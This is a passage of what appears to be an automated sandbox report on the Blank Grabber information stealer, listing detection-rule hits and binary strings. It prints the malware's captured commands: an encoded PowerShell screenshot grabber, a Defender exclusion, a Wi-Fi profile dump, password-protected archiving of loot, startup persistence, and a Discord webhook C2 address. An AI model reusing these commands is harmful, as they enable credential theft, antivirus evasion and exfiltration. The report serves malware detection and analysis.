fQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7544, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", ProcessId: 1136, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\phost.exe, ProcessId: 3444, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7400, TargetFilename: C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7500, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *, ProcessId: 7412, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe', ProcessId: 3140, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7620, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7748, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: phost.exe.3444.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
              Source: phost.exeReversingLabs: Detection: 34%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,105_2_00007FF6BBCC901C
              Source: phost.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: phost.exe, 00000001.00000002.2186287138.00007FFE13301000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdb source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: phost.exe, 00000001.00000002.2181473633.00007FFDFAA4F000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: phost.exe, 00000001.00000002.2185911655.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: phost.exe, 00000001.00000002.2186466073.00007FFE13337000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: phost.exe, phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: t.pdb source: powershell.exe, 0000004A.00000002.2038143526.000001C72DD50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: phost.exe, 00000001.00000002.2186119387.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: phost.exe, 00000001.00000002.2185499865.00007FFE10301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdbhP source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: phost.exe, 00000001.00000002.2184947186.00007FFE101D1000.00000040.00000001.01000000.0000000E.sdmp
